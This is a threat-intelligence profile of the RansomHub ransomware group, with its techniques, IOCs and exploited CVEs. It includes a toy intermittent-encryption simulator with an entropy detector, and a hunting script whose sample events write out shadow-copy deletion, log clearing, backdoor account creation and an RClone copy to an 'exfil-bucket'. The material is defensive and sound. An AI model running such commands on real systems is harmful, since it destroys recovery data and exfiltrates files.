THREAT ACTOR

RansomHub

THREAT LEVEL
5
EMERGENCE DATE
Feb 2024
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Former Knight ransomware affiliates, ALPHV/BlackCat actors, Evil Corp, forums like RAMP

DESCRIPTION

RansomHub emerged in February 2024 as a ransomware-as-a-service (RaaS) operation and by late 2024 was the most prolific RaaS platform by victim count. Its defining feature was an unusually generous affiliate split, up to 90% of proceeds to the affiliate, which drew experienced operators from dismantled operations. After claiming numerous victims worldwide, its infrastructure went completely dark on April 1, 2025.

CRITICALITY
Assesses the importance of the potential target, including its size and scale, the value of its data, and the operational impact of an attack.
LETHALITY
Evaluates the potential for damage from the attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group's behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Ransomware-as-a-Service (RaaS) platform

RansomHub's RaaS platform stood out for its exceptionally generous 90% affiliate commission. The codebase descends from the Cyclops and Knight variants: RansomHub launched within hours of Knight's source code being offered for sale in February 2024, and it drew displaced operators from ALPHV/BlackCat as well as actors linked to Evil Corp.

The high commission, combined with encryptors for Windows, Linux, ESXi, FreeBSD, and macOS, let the platform dominate the ecosystem quickly. Affiliate rules were strict: affiliates who broke the negotiation protocol faced permanent bans, and targeting of CIS countries and other restricted regions was prohibited. The platform ran under these rules until its sudden shutdown on April 1, 2025.

Current Status: Inactive as of April 1, 2025. (Threat levels reflect the threat actor's activity level)

Threat Level: 5

Origins and Methodology

RansomHub filled the void left by law enforcement disruptions of established groups, introducing new affiliate-management practices while reusing proven encryption techniques. Its rapid rise showed the persistent demand among cybercriminal affiliates for RaaS platforms offering stable infrastructure and favorable commission structures.

The ransomware used intermittent encryption: it encrypts a 0x100000-byte (1 MiB) chunk, skips the next 0x200000 bytes (2 MiB), and repeats, so only about a third of each large file is ever touched. That cuts encryption time sharply while still leaving files unusable, and combined with multi-threaded execution it allowed large environments to be encrypted quickly.

What is the Evolution of RansomHub Ransomware?
1. Formation

The group launched within 24 hours of the Knight source code sale, with infrastructure already prepared and immediately operational. Initial recruitment targeted affiliates displaced by disruptions of other operations, and the 90% commission rate proved highly attractive to experienced operators.

2. Evolution

By the end of 2024 the operation dominated the ransomware landscape with the highest victim count among active groups. Technical evolution included integration of EDRKillShifter (a loader that abuses a vulnerable signed driver to terminate EDR processes), expanded platform support across Windows, Linux, ESXi, FreeBSD, and macOS, and improved C2 infrastructure. Despite stated policies of avoiding certain sectors, the group hit critical infrastructure when profitable opportunities arose.

3. Lineage/Connections

The Cyclops → Knight → RansomHub progression shows clear code inheritance, with shared encryption routines and obfuscation methods. Former ALPHV/BlackCat affiliates brought established TTPs, while Evil Corp connections provided money laundering networks. This convergence produced an unusually capable operation until its sudden shutdown.

Which Unique Techniques Does RansomHub Use?

Emerging as a dominant force in the ransomware ecosystem, RansomHub employed mature attack methodologies refined through affiliate expertise and technical innovation.

TECHNIQUE

DETAILS

Infection Vectors

Primary access came through phishing campaigns delivering malicious attachments (T1566), exploitation of the ProxyShell chain in Microsoft Exchange Server, and compromised RDP credentials (T1078) bought from Initial Access Brokers.
Later campaigns attributed to the group's affiliates exploited the SAP NetWeaver Visual Composer zero-day (CVE-2025-31324, T1190) against enterprise resource planning systems. Affiliates also exploited VPN gateway misconfigurations and went after organizations with weak or missing multi-factor authentication (MFA).

Target Selection

Healthcare organizations faced heightened targeting because patient safety implications and operational criticality make them more likely to pay. Government entities attracted focus for their classified and sensitive citizen data repositories.
Professional services firms, including legal and accounting practices, were at risk from exposure of proprietary client information. Manufacturing was increasingly hit through SAP exploitation campaigns. Geographic focus spanned North America, Europe, and the Asia-Pacific region.

Operational Complexity

Affiliates used obfuscated, UPX-packed binaries to evade detection and legitimate remote-access tools such as AnyDesk and TeamViewer to blend in with administrative traffic. Thorough network reconnaissance preceded data exfiltration, and custom Go-based backdoors kept access open.
Custom malware was written in Go, with PowerShell used for reconnaissance, lateral tool transfer (T1570), and operational automation.

Key Features & Technical Details

The ransomware architecture combined proven encryption methods with performance optimizations for enterprise-scale deployments.

FEATURE

DETAILS

Encryption Method

Intermittent encryption of 0x100000-byte chunks with 0x200000-byte gaps, multi-threaded; encryptors for Windows, Linux, ESXi, FreeBSD, and macOS

File Extension

Not specified in this profile

Ransom Note

Dropped on encrypted systems with TOR payment instructions

Double Extortion

Data exfiltration before encryption, followed by graduated disclosure on the leak site if the victim does not pay

Communication Channels

TOR-based negotiation portals

Deployment Speed

Rapid; intermittent, multi-threaded encryption, with deployment often timed for weekends and holidays

Payment Method

Bitcoin and Monero

Operational Model

Ransomware-as-a-Service with a 90% affiliate commission and strictly enforced negotiation rules

Activities

The group kept an aggressive operational tempo throughout 2024, establishing dominance in the ransomware ecosystem before its sudden cessation. Peak activity in fall 2024 showed the platform's appeal to affiliates seeking profitable targets across diverse sectors.

Which Industries Are Most Vulnerable to RansomHub?

Manufacturing faced the highest targeting frequency due to production downtime costs and intellectual property value, making rapid payment decisions more likely. Healthcare systems experienced significant attacks contradicting stated avoidance policies, with critical patient care systems creating urgency for resolution. Professional services handling sensitive client data attracted double extortion tactics, while financial services suffered attacks targeting both operations and regulatory compliance.

Technology companies lost valuable source code and customer databases, government entities saw citizen services disrupted, and critical infrastructure including water/wastewater and transportation faced increasing attention during the group's final operational months.

Modus Operandi

The attack chain leveraged both automated tools and manual techniques, allowing affiliates to adapt tactics based on target environments.

Initial Access

Initial footholds came from exploiting CVE-2023-3519 (Citrix NetScaler ADC and Gateway), password spraying against RDP and VPN services (T1110.003), and phishing campaigns with malicious attachments or links (T1566.001/T1566.002). Once inside, CVE-2020-1472 (ZeroLogon) offered a fast route to the domain controller. Affiliates also frequently purchased access from Initial Access Brokers.

Discovery

Network mapping with Angry IP Scanner and Nmap (T1046) identified systems and services. Active Directory enumeration revealed high-value targets, automated scripts located backup systems and critical business applications, and file share discovery identified sensitive data repositories for exfiltration.

Remote Access

AnyDesk and ScreenConnect (T1219) provided persistent remote access, Cobalt Strike beacons handled post-exploitation, and custom backdoors kept access alive across security tool updates and system reboots.

Defense Evasion

EDRKillShifter disabled endpoint protection (T1562.001). Logs were cleared via WMI (T1070.001) to remove forensic evidence. Binaries were renamed to mimic legitimate processes (T1036), and attacks were timed for weekends and holidays to delay detection.

Credential Access

Mimikatz (T1003.001) extracted credentials from LSASS memory. Configuration files and password stores yielded additional access, and harvested cloud credentials and API keys extended the compromise across hybrid environments.

Command and Control

Multiple C2 servers, including IP addresses such as 193.106.175.107 and 45.134.140.69, provided resilience. TOR infrastructure obscured affiliate identities, and custom protocols evaded network monitoring.

Lateral Movement

RDP session hopping (T1021.001) and PsExec (T1569.002) enabled movement across the network. Compromised domain controllers provided enterprise-wide access, and pass-the-hash let affiliates authenticate with stolen NTLM hashes without ever knowing the passwords.

Exfiltration

Stolen data was pushed to AWS S3 buckets (T1567.002), with FTP servers and custom C2 infrastructure as alternative channels. WinSCP and RClone automated large-scale transfers, and data was compressed before transfer to reduce volume and the likelihood of detection.

Persistence

New administrative accounts (T1136.001) and re-enabled disabled accounts maintained access. Scheduled tasks (T1053) ensured re-execution after reboots, and registry modifications and service installations provided further persistence mechanisms.

Impact

Local drives, network shares, and cloud folders were encrypted (T1486). Ransom notes with TOR payment instructions appeared across systems. Business operations halted until resolution, with average downtime exceeding two weeks.

Encryption Technique

Intermittent encryption (0x100000-byte chunks encrypted, 0x200000 bytes skipped) accelerated deployment, and multi-threaded execution used every available core. System-critical files were skipped so that hosts remained bootable rather than failing outright.
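The chunk/skip stride described here and under Origins and Methodology is easy to misread as "encrypt a third of the file and stop". The following is an added example, not RansomHub code and not part of the original profile: it models the stride (encrypt 0x100000 bytes, skip 0x200000, repeat to end of file), shows that the encrypted share converges to 1/3, and then scans a file in chunk-sized windows for the periodic high-entropy pattern that distinguishes intermittently encrypted files from fully encrypted or clean ones. The XOR keystream and the sample "document" are constructed stand-ins; the real cipher is not modelled.

```python
"""Intermittent encryption as described in this profile (encrypt 0x100000 bytes,
skip 0x200000, repeat) and an entropy scan that recognises the resulting pattern.
The XOR keystream is a stand-in for the real cipher, not RansomHub code."""
import math
import random
from collections import Counter

CHUNK = 0x100000   # bytes encrypted per stride (1 MiB, from the profile)
SKIP = 0x200000    # bytes left untouched after each chunk (2 MiB, from the profile)


def encrypted_ranges(size, chunk=CHUNK, skip=SKIP):
    """[start, end) byte ranges a striding encryptor touches in a file of `size` bytes."""
    ranges = []
    pos = 0
    while pos < size:
        ranges.append((pos, min(pos + chunk, size)))
        pos += chunk + skip
    return ranges


def encrypted_fraction(size, chunk=CHUNK, skip=SKIP):
    """Share of the file that gets encrypted; chunk/(chunk+skip) = 1/3 for whole strides."""
    touched = sum(end - start for start, end in encrypted_ranges(size, chunk, skip))
    return touched / size if size else 0.0


def _keystream(key, start, length):
    """Deterministic toy keystream (assumption: stands in for the real cipher).
    Seeding with key and chunk offset makes every chunk's keystream distinct."""
    return random.Random((key << 64) | start).randbytes(length)


def intermittent_encrypt(data, key, chunk=CHUNK, skip=SKIP):
    """Apply the stride pattern: XOR each selected chunk with its keystream.
    XOR is symmetric, so calling this again with the same key decrypts."""
    out = bytearray(data)
    for start, end in encrypted_ranges(len(data), chunk, skip):
        ks = _keystream(key, start, end - start)
        mixed = int.from_bytes(out[start:end], "big") ^ int.from_bytes(ks, "big")
        out[start:end] = mixed.to_bytes(end - start, "big")
    return bytes(out)


def shannon_entropy(buf):
    """Bits per byte; random-looking ciphertext approaches 8.0, text sits well below."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def scan_for_striding(data, chunk=CHUNK, skip=SKIP, threshold=7.5):
    """Entropy-scan a file in chunk-sized windows. Returns the indices of the
    high-entropy windows and whether they sit exactly on the encrypt/skip stride,
    which separates intermittent encryption from a fully encrypted or clean file."""
    offsets = range(0, len(data), chunk)
    high = [i for i, off in enumerate(offsets)
            if shannon_entropy(data[off:off + chunk]) >= threshold]
    stride = (chunk + skip) // chunk          # every 3rd window for the profile's values
    expected = [i for i in range(len(offsets)) if i % stride == 0]
    return high, bool(high) and high == expected


def sample_plaintext(size):
    """Constructed low-entropy input standing in for a document (not a real file)."""
    pattern = b"Quarterly report, constructed sample text for the encryption demo. "
    return (pattern * (size // len(pattern) + 1))[:size]


if __name__ == "__main__":
    plain = sample_plaintext(4 * CHUNK)
    cipher = intermittent_encrypt(plain, key=0x5EED)
    print("encrypted ranges:", [(hex(s), hex(e)) for s, e in encrypted_ranges(len(plain))])
    print("fraction encrypted: %.3f" % encrypted_fraction(len(plain)))
    print("high-entropy windows, on stride:", scan_for_striding(cipher))
    assert intermittent_encrypt(cipher, key=0x5EED) == plain
```

The scan is the practical takeaway: a file where every third 1 MiB window is near 8 bits/byte while the rest keeps its normal entropy has been hit by a striding encryptor, and backup validation or file-integrity jobs that only sample the first few bytes of a file will miss it entirely because the first chunk may be the only one encrypted in a small file.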

Extortion

Graduated data disclosure on the leak site pressured victims, and TOR-based negotiation portals handled communication. Bitcoin and Monero payments obscured money flows. Threats to notify regulators added pressure on organizations in regulated industries.

Anti-Recovery and Anti-Forensics

Volume Shadow Copies were deleted (T1490) to prevent recovery, and event logs were cleared to remove attack evidence. Anti-forensic scripts overwrote unallocated disk space, and configuration changes disabled recovery options.
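The steps above leave command lines that any process-creation log captures: shadow copy deletion and recovery changes, event log clearing, new admin accounts, scheduled tasks, RClone pushes to cloud storage, PsExec. The following is an added example, not code from this profile or from any RansomHub tooling: a small hunting script with regex rules mapped to the ATT&CK IDs cited in this section, run over constructed Sysmon-style process-creation events in JSON lines. Every hostname, user, and command line in the sample is made up for the demo.

```python
"""Hunting rules for the post-exploitation command lines described in this
profile, run over constructed Sysmon-style process-creation events (JSON lines)."""
import json
import re

# (ATT&CK technique, label, pattern matched against the lower-cased command line)
RULES = [
    ("T1490", "Shadow copy deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
                r"win32_shadowcopy.*\.delete\(")),
    ("T1490", "Boot recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("T1070.001", "Windows event log clearing",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b|clear-eventlog|cleareventlog")),
    ("T1136.001", "Local account created or added to Administrators",
     re.compile(r"net1?(\.exe)?\s+user\s+\S+\s+(\S+\s+)?/add|"
                r"net1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add")),
    ("T1053.005", "Scheduled task persistence",
     re.compile(r"schtasks(\.exe)?\s+/create\b")),
    ("T1567.002", "Bulk transfer to cloud storage (RClone)",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b.*\b(s3|mega|b2|drive):")),
    ("T1569.002", "PsExec remote service execution",
     re.compile(r"\bpsexec(64)?(\.exe)?\s")),
]

# Constructed sample events (not real telemetry); two benign lines at the end.
SAMPLE_EVENTS = r"""
{"Computer":"FS01","User":"CORP\\svc_backup","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\vssadmin.exe","CommandLine":"vssadmin.exe delete shadows /all /quiet"}
{"Computer":"FS01","User":"CORP\\svc_backup","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\bcdedit.exe","CommandLine":"bcdedit /set {default} recoveryenabled No"}
{"Computer":"DC01","User":"CORP\\Administrator","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\wevtutil.exe","CommandLine":"wevtutil.exe cl Security"}
{"Computer":"DC01","User":"CORP\\Administrator","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\net.exe","CommandLine":"net user svc_helpdesk Summer2024! /add"}
{"Computer":"DC01","User":"CORP\\Administrator","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\net.exe","CommandLine":"net localgroup administrators svc_helpdesk /add"}
{"Computer":"WS42","User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\schtasks.exe","CommandLine":"schtasks /create /tn \"WindowsUpdateCheck\" /tr C:\\ProgramData\\update.exe /sc onstart /ru SYSTEM"}
{"Computer":"FS01","User":"CORP\\svc_backup","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\Temp\\rclone.exe","CommandLine":"rclone.exe copy \\\\FS01\\Finance s3:exfil-bucket --transfers 32"}
{"Computer":"WS42","User":"CORP\\Administrator","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\Temp\\psexec.exe","CommandLine":"psexec.exe \\\\WS07 -s cmd.exe"}
{"Computer":"WS17","User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\jdoe\\Documents\\q3.docx\""}
{"Computer":"WS17","User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe Get-Service"}
"""


def match_event(event):
    """Techniques whose rule matches this event's command line."""
    cmd = event.get("CommandLine", "").lower()
    return [(tid, label) for tid, label, rx in RULES if rx.search(cmd)]


def hunt(lines):
    """Scan JSON-lines events; return (technique, label, host, user, command line) hits."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for tid, label in match_event(ev):
            hits.append((tid, label, ev.get("Computer", "?"),
                         ev.get("User", "?"), ev.get("CommandLine", "")))
    return hits


def hosts_by_technique(hits):
    """Collapse hits into {technique: sorted hosts}; a host that shows several
    stages (T1490 plus T1567.002, say) is the one to isolate first."""
    out = {}
    for tid, _label, host, _user, _cmd in hits:
        out.setdefault(tid, set()).add(host)
    return {tid: sorted(hosts) for tid, hosts in out.items()}


if __name__ == "__main__":
    for tid, label, host, user, cmd in hunt(SAMPLE_EVENTS.splitlines()):
        print(f"{tid:10} {label:48} {host:5} {user:22} {cmd}")
    print(hosts_by_technique(hunt(SAMPLE_EVENTS.splitlines())))
```

Individually, several of these commands are things an administrator runs; the signal is the combination on one host within a short window (shadow copies gone, recovery disabled, a new local admin, a bulk RClone copy to an S3 remote) and the timing the profile notes, since affiliates deploy on weekends and holidays. Feed the same rules to your SIEM's process-creation table and alert on two or more distinct techniques per host per hour rather than on any single match.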

Indicators of Compromise (IOCs)

Key indicators help identify RansomHub operations within networks, particularly specific network infrastructure, file system artifacts, and behavioral patterns.

INDICATOR

DETAILS

File Hashes

Not reproduced in this profile. Affiliates rebuild and UPX-pack their payloads, so hash matching is weak; hunt on the behaviors listed under Modus Operandi instead.

IP Addresses

193.106.175.107 and 45.134.140.69 (C2 servers cited in the Modus Operandi section)

Domains/URLs

.onion negotiation and leak-site addresses (specific addresses vary per campaign)

File Paths

C:\ProgramData (common backdoor and tooling drop directory)
C:\Windows\Temp (staging location for exfiltration)

File Extensions

Not specified in this profile

Tools Observed

EDRKillShifter, Angry IP Scanner, Nmap, Mimikatz, Cobalt Strike, PsExec, AnyDesk, ScreenConnect, TeamViewer, WinSCP, RClone

Exploits and Vulnerabilities

Affiliates leveraged both known vulnerabilities and configuration weaknesses to establish initial access and maintain persistence.

EXPLOITS AND VULNERABILITIES

PRODUCT | CVE | CVSS | DESCRIPTION

SAP NetWeaver Visual Composer | CVE-2025-31324 | 10.0 | Missing authorization on the Visual Composer Metadata Uploader allows unauthenticated file upload, letting an attacker drop a JSP webshell and gain remote code execution

Microsoft Exchange Server (ProxyShell) | CVE-2021-34473 | 9.8 | Pre-authentication path confusion in the Autodiscover front end; the entry point of the ProxyShell chain, reaching backend endpoints without credentials

Microsoft Exchange Server (ProxyShell) | CVE-2021-34523 | 9.8 | Privilege elevation on the Exchange PowerShell backend, giving the attacker privileged PowerShell access during the chain

Microsoft Exchange Server (ProxyShell) | CVE-2021-31207 | 7.2 | Post-authentication security feature bypass: a mailbox export writes attacker-controlled content to disk, dropping a webshell and completing the server compromise

Windows Netlogon (ZeroLogon) | CVE-2020-1472 | 10.0 | Flawed use of AES-CFB8 with an all-zero IV in Netlogon authentication lets an unauthenticated attacker on the network reset the domain controller's machine account password and take over the domain

Beyond CVE exploitation, affiliates targeted weak RDP credentials, outdated VPN firmware, identity management gaps in hybrid clouds, and unpatched end-of-life systems. The group excelled at chaining vulnerabilities, combining initial access with privilege escalation for rapid domain compromise.